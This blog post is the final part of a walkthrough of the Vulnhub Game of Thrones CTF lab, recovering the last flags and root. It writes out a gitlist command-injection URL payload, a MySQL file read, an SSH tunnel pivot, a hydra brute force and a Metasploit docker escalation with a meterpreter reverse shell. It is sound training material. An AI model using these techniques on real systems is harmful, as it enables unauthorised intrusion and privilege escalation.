Press "Enter" to skip to content

Game of Thrones CTF 1 Walkthrough – Part 3

This post covers the third and last part of the walkthrough of the Game of Thrones CTF 1 provided by Vulnhub. You can find the first and second part here and here. In the first two parts I have already found 5 kingdom flags and 1 secret flag.

I finished the second part with the 5th kingdom flag which was the one from the Mountain and the Vale where I got the next hint to access the imap server. So lets do this:

Flag 6 – The Reach

Having a look at the open ports on the server I see that the imap server is closed, so I somehow need to open it. I remembered that there were some hints pointing to port knocking in the first part, so I might knock to those ports in order to open the imap port.

root@kali:~# knock -v 192.168.56.101 3487:tcp 64535:tcp 12345:tcp
hitting tcp 192.168.56.101:3487
hitting tcp 192.168.56.101:64535
hitting tcp 192.168.56.101:12345
root@kali:~# nmap 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-28 15:06 CEST
Nmap scan report for winterfell.7kingdoms.ctf (192.168.56.101)
Host is up (0.00078s latency).
Not shown: 992 closed ports
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
53/tcp    open     domain
80/tcp    open     http
143/tcp   open     imap
3306/tcp  filtered mysql
5432/tcp  open     postgresql
10000/tcp open     snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 95.83 seconds

Yes, port 143 is open now, so lets connect to it and see if there are some emails.

root@kali:~# nc 192.168.56.101 143
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=LOGIN AUTH=PLAIN] Kingdom of the Reach
? LOGIN olennatyrell@7kingdoms.ctf H1gh.Gard3n.powah                                                        
? OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
? LIST "" "*"
* LIST (\HasNoChildren \Trash) "/" Trash
* LIST (\HasNoChildren \Drafts) "/" Drafts
* LIST (\HasNoChildren \Sent) "/" Sent
* LIST (\HasNoChildren) "/" INBOX
? OK List completed (0.000 secs).
? Select INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1504823858] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* OK [HIGHESTMODSEQ 2] Highest
? OK [READ-WRITE] Select completed (0.000 secs).
? FETCH 1 BODY[]
* 1 FETCH (BODY[] {797}
Return-Path: <lorastyrell@7kingdoms.ctf>
Delivered-To: olennatyrell@7kingdoms.ctf
Received: by mail.7kingdoms.ctf (Postfix, from userid 0)
	id E1FA643329; Fri,  8 Sep 2017 00:37:37 +0200 (CEST)
Subject: You conquered the Kingdom of the Reach
From: Sir_Loras_Tyrell<lorastyrell@7kingdoms.ctf>
To: <olennatyrell@7kingdoms.ctf>
X-Mailer: mail (GNU Mailutils 2.99.98)
Message-Id: <20170907223737.E1FA643329@mail.7kingdoms.ctf>
Date: Fri,  8 Sep 2017 00:37:37 +0200 (CEST)

Congratulations!!

You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db

Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:
User: TywinLannister
Pass: LannisterN3verDie!

"The things I do for love..." - Jaime (Kingslayer) Lannister
)
? OK Fetch completed (0.000 secs).

Cool, already found the flag and some new hints to the next flag which is, according to the map, a gitlist and mysql

Flag 7 – The Rock and King’s Landing

This is already the last kingdom flag! Connecting to http://192.168.56.101:1337 and logging in gives a gitlist. On /casterly-rock/ there is a note from Tyrion

There is a note under the bed. Somebody put it there. It says:

2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874

"The main gates of King's Landing are permanently closed by Queen's order. You must search for another entrance"

where the note is hex encoded and says:
/home/tyrionlannister/checkpoint.txt

I assume that in this file is the next hint, so I need to find a way to read it. After a while of trial and error, I found an exploit on gitlist using searchsploit. However, I could not manage to make the exploit work because of authentication errors, but I could figure out how the exploit works, so I exploited the gitlist manually using the following steps (for more details on how the exploit works, see https://www.exploit-db.com/exploits/33929/):

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60cat%20%2Fhome%2Ftyrionlannister%2Fcheckpoint.txt%60

This basically executes 'cat /home/tyrionlannister/checkpoint.txt' on the server.

I got new credentials (cerseilannister/_g0dsHaveNoMercy_) which belongs to a database called kingslanding. In order to connect to that database, I again used the exploit from before.

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20'show%20tables;'%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e 'show tables;'

There is a table called iron_throne. Lets see what is in there:

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20'select%20*%20from%20iron_throne;'%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e 'select * from iron_throne;'

decoding morse code gives: /etc/mysql/flag

So now lets see if we can read this flag

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60cat%20%2Fetc%2Fmysql%2Fflag%60

Unfortunately, I could not read the file with cat. I also tried to execute it or look at the permissions, but none of it worked. After a while I again went through the hints when I found one in the last image. “You still have some privileges on this kingdom. Use them wisely”. I might have some other privileges on this database. Lets see

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20%27show%20grants%20for%20current_user%3B%27%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e 'show grants for current_user;'

And indeed, I have file permissions on every database and table, so I tried to load the file /etc/mysql/flag into the table iron_throne. Unfortunately it did not work because the columns did not match. So I created a new table with only one column for the flag.

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20%22create%20table%20Flag%20(flag%20varchar(500))%3B%22%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "create table Flag (flag varchar(500));"

There was no specific error message from the mysql server, so I assume the query was valid and therefore the table was created. So lets try to load the file into this table.

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20%22load%20data%20infile%20%27%2Fetc%2Fmysql%2Fflag%27%20into%20table%20Flag%3B%22%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "load data infile '/etc/mysql/flag' into table Flag;"

Again, no mysql error occured so I tried to read the table. There you go

Found the last kingdom flag c8d46d341bea4fd5bff866a65ff8aea9 and also the credentials to the ssh port (daenerystargaryen-.Dracarys4thewin.)

Secret Flag – Dragonglass

So what is left now: I still need to find the final flag which is on the ssh port and there are also two special flags left. For one of them I have already an idea. On the postgres server there has been another table called braavos_book. But lets look at this later. Let me first connect to the ssh port.

root@kali:~# ssh daenerystargaryen@192.168.56.101
daenerystargaryen@192.168.56.101's password: 
 __            _   _            ___         
|  |   ___ ___| |_|_|___ ___   |  _|___ ___ 
|  |__| . | . | '_| |   | . |  |  _| . |  _|
|_____|___|___|_,_|_|_|_|_  |  |_| |___|_|  
                        |___|               
 ____                          _             
|    \ ___ ___ ___ ___ ___ ___| |___ ___ ___ 
|  |  |  _| .'| . | . |   | . | | .'|_ -|_ -|
|____/|_| |__,|_  |___|_|_|_  |_|__,|___|___|
              |___|       |___|              

daenerystargaryen@7kingdoms:~$ ls
checkpoint.txt  digger.txt
daenerystargaryen@7kingdoms:~$ cat checkpoint.txt 

"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre

"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly

"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow
daenerystargaryen@7kingdoms:~$ 

Ok there seems to be another machine on 172.25.0.2. The hint ‘maybe we can reach the root of the problem pivoting from outside to use this digger’ might refer to brute forcing the root password using the digger.txt file.
So I copied the file on my local machine. With hydra I tried to crack the password for root on 192.168.56.101 but I did not succeed (I forgot that brute force on the target machine blocks you for some time). So it is probably the root account on 172.25.0.2. Since I do not have hydra on the other machine, I created an ssh-tunnel to the second host using

root@kali:~# ssh daenerystargaryen@192.168.56.101 -L 2222:172.25.0.2:22 -N
root@kali:~# hydra -l root -P digger.txt ssh://localhost:2222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-22 21:20:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1001 login tries (l:1/p:1001), ~63 tries per task
[DATA] attacking ssh://localhost:2222/
[2222][ssh] host: localhost   login: root   password: Dr4g0nGl4ss!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-22 21:21:35
root@kali:~# ssh root@localhost -p 2222
root@localhost's password: 

You found the
 ____                          _             
|    \ ___ ___ ___ ___ ___ ___| |___ ___ ___ 
|  |  |  _| .'| . | . |   | . | | .'|_ -|_ -|
|____/|_| |__,|_  |___|_|_|_  |_|__,|___|___|
              |___|       |___|              
       _         
 _____|_|___ ___ 
|     | |   | -_|
|_|_|_|_|_|_|___|
                 
root@1558d33076eb:~# ls -al
total 20
drwx------ 1 root root 4096 Aug 29 18:14 .
drwxr-xr-x 1 root root 4096 Sep  7 22:37 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  290 Aug 29 17:10 flag.txt
root@1558d33076eb:~# cat flag.txt 
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9

Now you have the Dragonglass weapons to fight against the White Walkers.

Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven

"The time has come" - The Three Eyed Raven
root@1558d33076eb:~# 

Yes, found the next secret flag from the Dragonglass mine. I now also have access to the second account on the other machine, i.e., the one from Brandon Stark. So let me connect to it.

root@kali:~# ssh branstark@192.168.56.101
branstark@192.168.56.101's password: 
 _____ _         _    _____     _   _   _
|   __|_|___ ___| |  | __  |___| |_| |_| |___
|   __| |   | .'| |  | __ -| .'|  _|  _| | -_|
|__|  |_|_|_|__,|_|  |_____|__,|_| |_| |_|___|

branstark@7kingdoms:~$ ls
checkpoint.txt
branstark@7kingdoms:~$ cat checkpoint.txt 

Now you are ready to face the final battle!! Try to escalate to root.

"Seven blessings to all of you and good luck" - Game of Thrones CTF master ;)

branstark@7kingdoms:~$

For this part I had some longer time, so let speed up a bit and tell you how I finally escalated the privileges. After searching for some obvious possibilities to escalate privileges such as executables with the setuid bit set or exploits for the kernel, I eventually noticed that this server is docker based and remembered myself about a hint that has mentioned docker. So I went finding an exploit on docker and found a metasploit module that uses a privilege escalation exploit on docker.

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set USERNAME branstark
USERNAME => branstark
msf auxiliary(ssh_login) > set PASSWORD Th3_Thr33_Ey3d_Raven
PASSWORD => Th3_Thr33_Ey3d_Raven
msf auxiliary(ssh_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(ssh_login) > run

[+] 192.168.56.101:22 - Success: 'branstark:Th3_Thr33_Ey3d_Raven' 'uid=1001(branstark) gid=1001(branstark) groups=1001(branstark),999(docker) Linux 7kingdoms 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.56.102:42183 -> 192.168.56.101:22) at 2017-11-29 13:46:46 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(docker_daemon_privilege_escalation) > set SESSION 1
SESSION => 1
msf exploit(docker_daemon_privilege_escalation) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(docker_daemon_privilege_escalation) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Writing payload executable to '/tmp/sSonzaBe'
[*] Executing script to create and run docker container
[*] Waiting 60s for payload
[*] Sending stage (847604 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.101:55224) at 2017-11-29 13:47:56 +0100
[+] Deleted /tmp/sSonzaBe

meterpreter > cd /root
meterpreter > ls
Listing: /root
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  25    fil   2017-09-08 00:39:28 +0200  .bash_history
100644/rw-r--r--  570   fil   2010-01-31 12:52:26 +0100  .bashrc
40755/rwxr-xr-x   4096  dir   2017-08-10 23:56:54 +0200  .nano
100644/rw-r--r--  148   fil   2015-08-17 17:30:33 +0200  .profile
100644/rw-r--r--  66    fil   2017-08-10 23:56:54 +0200  .selected_editor
40700/rwx------   4096  dir   2017-08-19 13:30:48 +0200  .ssh
100700/rwx------  466   fil   2017-08-29 19:13:48 +0200  checkpoint.txt
100700/rwx------  1156  fil   2017-09-07 23:00:03 +0200  final_battle

meterpreter > cat checkpoint.txt

To defeat White Walkers you need the help of the Savages, the Many-Faced God skill learned at Braavos and the Dragonglass weapons

Some hints:

type of file = ???
pass = ???
useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))

"Hodor... Hodor!!" - Hodor

meterpreter > 

Along with this checkpoint.txt there is also a zip file called final_battle. This zip is password protected and I need to compute the password from the three additional flags using the pseudo code in the hint.

Secret Flag – Braavos Book

Since I have one missing I need to find it first. As already mentioned, I assume it is in the braavos table in the database, so lets reconnect to it. Using the same procedures as in Part 2, I found the table

1 | City of Braavos is a very particular place. It is not so far from here.
2 | "There is only one god, and his name is Death. And there is only one thing we say to Death: Not today" - Syrio Forel
3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
4 | "A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all" - Jaqen H'ghar
6 | "A girl has no name" - Arya Stark
7 | City of Braavos is ruled by the Sealord, an elected position.
8 | "That man's life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed" - Jaqen H'ghar
9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc

What I see here are again some cites from the series except of the last one which seems to be encrypted using some ancient cipher. What I also recognised is that there is no id 5. After a while I found out that the cipher is a cesar cipher with a shift of 10. Decoding it gives the following:

echo "Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc" | tr [K-ZA-Jk-za-j] [A-Za-z]
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis

Ok. Next, I assume that id 5 is the missing page number. Based on the hint, I further assume that the next step is to look in aryas_kill_list under the 5. entry which is TheRedWomanMelisandre. So let me connect to this database called braavos with username/password TheRedWomanMelisandre/ValarMorghulis. On this database there was only one table that contained the flag 3f82c41a70a8b0cfec9052252d9fd721.

Final Flag

Now since I have all secret flags, I can write a little script that computes the password from the secret flags according to the pseudocode in the hint

#!/usr/bin/python

flag1 = '8bf8854bebe108183caeb845c7676ae4'    # Savages
flag2 = '3f82c41a70a8b0cfec9052252d9fd721'    # Braavos
flag3 = 'a8db1d82db78ed452ba0882fb9554fc9'    # Dragonglass

password = flag1[len(flag1)-10:] + flag2[len(flag2)-10:] + flag3[len(flag3)-10:]

print "Password: " + password

which then gives the password

Password: 45c7676ae4252d9fd7212fb9554fc9

Now simply unzipping the final_battle.zip with this password gives a text file called flag.txt which contains

Final Battle flag: 8e63dcd86ef9574181a9b6184ed3dde5
                     _
 ___ _ _ _ ___ ___ _| |
| . | | | |   | -_| . |
|  _|_____|_|_|___|___|
|_|

You won the battle against White Walkers. You pwned the Game of Thrones CTF!!! (v1.0 September 2017)

Now the seven kingdoms can rest in peace for a long time ruled by a true king/queen.

Congratulations and I hope you enjoyed the experience as much as me making it!!

Designed by Oscar Alfonso (OscarAkaElvis or v1s1t0r)
Contact: v1s1t0r.1s.h3r3@gmail.com
https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf

A last little present! you can get now all the flags ordered:

Dorne
Winterfell
Iron Islands
Stormlands
Mountain and the Vale
Reach
Rock and King's Landing
Savages
City of Braavos
Dragonglass Mine
Final Battle

Get the word of each one using https://crackstation.net or any other md5 online crack service to get a phrase in a row!!

Reordering the flags accordingly and decoding the hashes gives:

congratulations you pwned the seven kingdoms game of thrones ctf awesome

I hope you enjoyed this series. As always, you are very welcome to ask questions in the comments or simply leave a feedback for future walkthroughs.

Cheers and Happy Hacking!

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *